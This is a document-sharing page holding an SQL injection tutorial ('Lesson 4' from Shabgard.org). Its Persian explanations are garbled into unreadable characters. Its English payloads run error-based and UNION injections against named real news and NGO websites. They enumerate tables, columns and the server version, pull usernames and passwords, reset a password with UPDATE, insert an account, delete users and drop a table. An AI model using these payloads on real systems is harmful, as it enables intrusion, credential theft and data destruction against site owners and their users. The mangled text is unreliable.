Lesson 4

  • November 2019
  • PDF
Download

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA

Overview

Download & View Lesson 4 as PDF for free.

More details

  • Words: 520
  • Pages: 3
SQL Injection (Lesson ) (Using SQL Server) ̵έϮΠҨϭΪϴϨ̰ϧϩΩΎϔΘγ΍˯ϮγϑΪϫ̵ΎϬΘҨΎγΕΎϋϼσ΍ί΍ϥ΍ϮϨϋ̨ϴϫϪΑϢҨήΑϮϠΟϝΎΜϣΎΑϩέ΍ήϗϪ̯ϻΎΣϢϨ̶̯ϣζϫ΍ϮΧςϘϓ ϪηΎΑϪΘη΍ΩϪϣ΍Ω΍ΎϬϟΎΜϣϦҨ΍ϭϢηΎΒϧέΎθϓΖΤΗϢϨϣϪ̯ϪηΎΑ

ϪηΎΑ΢ϴοϮΗϪΑ̵ίΎϴϧϢϨ̶̯Ϥϧή̰ϓ)

αέΩί΍̶ҨΎϬϟΎΜϣ

getting table names and column names http://www.iribnews.ir/Full_fa.asp?news_id=ϑΪϫΖϳΎγ http://www.iribnews.ir/Full_fa.asp?news_id=' Microsoft OLE DB Provider for SQL Server error 'e' Unclosed quotation mark before the character string ''. /Full_fa.asp, line 

http://www.iribnews.ir/Full_fa.asp?news_id='%'%having%=-Microsoft OLE DB Provider for SQL Server error 'e' Column 'iribnews_fa.Lead' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Full_fa.asp, line 

iribnews_fa= the table name Lead= the first column name http://www.iribnews.ir/Full_fa.asp?news_id=''%group%by%iribnews_fa.Lead%having%=-Microsoft OLE DB Provider for SQL Server error 'e' Column 'iribnews_fa.Title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /Full_fa.asp, line 

http://www.iribnews.ir/Full_fa.asp?news_id=''%group%by%iribnews_fa.Lead,iribnews_fa.Title% having%=-Microsoft OLE DB Provider for SQL Server error 'e' Column 'iribnews_fa.date' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /Full_fa.asp, line 

Ϣϳέϭ΁̶ϣΖγΪΑ΍έΎϬϧϮΘγϪΑρϮΑήϣΕΎϋϼσ΍ΐϴΗήΗϦϴϤϫϪΑ

=> iribnews_fa.Lead , iribnews_fa.Title , iribnews_fa.date , iribnews_fa.time , iribnews_fa.fa_date , iribnews_fa.news_num iribnews_fa.Type , iribnews_fa.code , iribnews_fa.prm_news , iribnews_fa.sec_news , iribnews_fa.keyword , iribnews_fa.content , iribnews_fa.ext_link, iribnews_fa.ext_link, iribnews_fa.ext_link, iribnews_fa.pic_path , iribnews_fa.pic_path , iribnews_fa.pic_path , iribnews_fa.video , iribnews_fa.Audio_path , iribnews_fa.Audio_path , iribnews_fa.Audio_path , iribnews_fa.Video_path , iribnews_fa.Video_path , iribnews_fa.Video_path

getting column types http://www.iribnews.ir/Full_fa.asp?news_id='%'%union%select%sum(title)%from%iribnews_fa--

Microsoft OLE DB Provider for SQL Server error 'e' The sum or average aggregate operation cannot take a varchar data type as an argument. /Full_fa.asp, line 

=> is

non-numerical

ϩήΘϬΑϢϳήϧήΗϮϠΟϦϳ΍ί΍Ϫ̴ϳΩϝΎΜϣϦϳ΍ϮΗ

έϭήγΕΎϋϼσ΍ϦΘϓή̵̳΍ήΑϝΎΜϣϪҨϢϨҨ΍

getting the version number of server http://www.abong.org.br/novosite/institucional/associadas_pagpubli.asp?midia =Folhetos'%UNION%ALL%SELECT%null,null,null, @@version,null,null,null,null,null,null,null,null,--

Microsoft SQL Server - ..(Intel X) May ::Copyright (c) -Microsoft Corporation Enterprise Edition on Windows NT .(Build : Service Pack )

̵΍ήΑέΎ̯Ϧϳ΍ΪόΑϪΑΎΠϨϳ΍ί΍,ϥΩή̯injectϊϗϮϣέΩProxyί΍ϩΩΎϔΘγ΍Ϣϧϭ΍ΪϴϨ̯ϪΟϮΗϪΘ̰ϧϪϳϪΑΪϳΎΑΪϳΪΟαέΩωϭήηί΍ϞΒϗϥΎΘγϭΩΏϮΧ ϪϣίϻϥΪϧϮϣαΎϨηΎϧ

æîçææêæåëçèëíåíå

ϢϨ̶̯ϣΩΎϬϨθϴ̡ϪόϟΎτϣ̵΍ήΑϭέhttp://www.stayinvisible.com ϦϣϢϬϣ̶ϠϴΧϥϮΗ΍ήΑϥΪϧϮϣαΎϨηΎϧϪ̳΍

ϢϴϨ̶̯ϣωϭήηβ̡column typesϢϫϭcolumn namesϢϫϭϢҨέ΍Ωϭέ table namesϢϫϥϻ΍ΎϣΏϮΧ ΪϴϨ̯νήϓ

table names=users column names=username , password

Getting Username & Password from table: - Login: ' union select min (name), ,from users where username > 'a';-Microsoft OLE DB provider for ODBC driver error ‘e’ [Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar value ‘ehsan’ to a column of data type int. /login.asp, line 

ehsanΩήΑ̶̡databaseέΩΩϮΟϮϣ̵Ύϫ usernameϪΑϥ΍ϮΗ̶ϣϕϮϓέϮΘγΩί΍ϩΩΎϔΘγ΍ΎΑ ϢϴϨ̶̯ϣϞϤϋήҨίϖΑΎτϣή̴ҨΩ̵ΎϫέίϮҨϥΩή̯΍Ϊϴ̵̡΍ήΑ

- Login: ' union select min (name), ,from users where username > 'ehsan' ; -Microsoft OLE DB provider for ODBC driver error ‘e’ [Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar value ‘ahmadi’ to a column of data type int. /login.asp, line  ΎҨϭϢϴϨ̯νϮϋϭέ passwordϭϢϴϨ̯ϩΩΎϔΘγ΍UPDATEέϮΘγΩί΍ϢϴϧϮΗ̶ϣϢϫϢҨέ΍ΩϭέusernameΎϣϥϻ΍ΏϮΧ ΩϮη̶ϣϩΩ΍Ω΢ϴοϮΗϪϣ΍Ω΍έΩUPDATEέϮΘγΩ ϢϴϨ̯ϞϤϋήҨίϖΑΎτϣ

- Login: ' union select password, ,from users where username ='ehsan' ; -Microsoft OLE DB provider for ODBC driver error ‘e’ [Microsoft] [ODBC SQL Server Driver] [SQL Server] syntax error converting

the character value ‘frft’ to a column of a data type Int.

ΪηΎΑ̶ϣ frftήΑ΍ήΑehsanΩέϮδ̡ϢϴϨ̶̯ϣϩΪϫΎθϣϻΎΑErrorέΩΖϗΩΎΑ ̵ΎϬγέΩέΩϪ̯Ωή̯ϩΪϫΎθϣΎΠ̰Ҩϭέpasswordϭ usernameϞ̯ϪθϴϣϪ̯ϩέ΍ΩΩϮΟϭ̶ҨΎϬϫ΍έϪΘΒϟ΍ ϢҨί΍Ωή̶̡ϣϥ΁ϪΑ̵ΪόΑ ϢϴϨ̶̯ϣϩΩΎϔΘγ΍UPDATEέϮΘγΩί΍databaseέΩήψϧΩέϮϣήϳΩΎϘϣήϴϴϐΗ̵΍ήΑ

- Login: ' UPDATE users set users.password = 'ffk' where (users.username = 'ehsan'); -- Pass:

ϢϴϫΩ̶ϣήϴϴϐΗffkϪΑϭέ ehsan έίϮϳΩέϮδ̡ϻΎΑέϮΘγΩί΍ϩΩΎϔΘγ΍ΎΑ

Then Login with :

- Login: ehsan - Pass: ffk .ΪϴϨ̯ϪϓΎο΍databaseϪΑϭέήψϧΩέϮϣήϳΩΎϘϣΪϴϧϮΗ̶ϣΎϤηINSERT έϮΘγΩί΍ϩΩΎϔΘγ΍ΎΑ

- Login: ' insert into users(users.username,users.password) values ('ali',''); - - Pass:

ϢϴϨ̯ΩΎΠϳ΍ΩέϮδ̡ΎΑϭaliϢγ΍ϪΑusernameϪϳϢϴϧϮΗ̶ϣϻΎΑέϮΘγΩί΍ϩΩΎϔΘγ΍ΎΑ

Then Login with :

- Login: ali - Pass:  ϢϴϨ̶̯ϣϑάΣ databaseί΍ϭέήψϧΩέϮϣήϳΩΎϘϣ DeleteέϮΘγΩί΍ϩΩΎϔΘγ΍ΎΑ

- Login: ehsan' delete from users; --

ΪϨ̶̯ϣϑάΣϭέ ehsanέίϮϳϕϮϓέϮΘγΩ

ΩϮη̶ϤϧϪϴλϮΗέϮΘγΩϦϳ΍ί΍ϩΩΎϔΘγ΍ϪΘΒϟ΍,Ωή̯ϑάΣϭέ databaseϥ΍ϮΗ̶ϣ DropέϮΘγΩί΍ϩΩΎϔΘγ΍ΎΑ

- Login: ' drop table users; -̶όγϩΪϨϳ΁έΩϝΎΣήϫϪΑΪϴϨ̯ΩέϮΧήΑεΎϫΎΑϪϨ̰ϤϣϪ̯ΖδϫΕ΍έϮΘγΩϦϳ΍ϮΗ̵έΎ̯ϩΰϳέΎΗΪϨ̩ϪηΎΑήμΘΨϣϭΪϴϔϣΐϟΎτϣϡΩή̶̯όγ ϡί΍Ωή̢ΑϢϫΎϫ̵έΎ̯ϩΰϳέϦϳ΍ϪΑϢϨ̶̯ϣ



Author: [email protected]

Copyright © Shabgard.org. All rights reserved. http://isun.Shabgard.org

Related Documents

Lesson 4
December 2019 29
Lesson 4
November 2019 23
Lesson 4
May 2020 10
Lesson 4
October 2019 30
Lesson 4
June 2020 8
Lesson 4
June 2020 0

Copyright © 2024 PDFCOKE.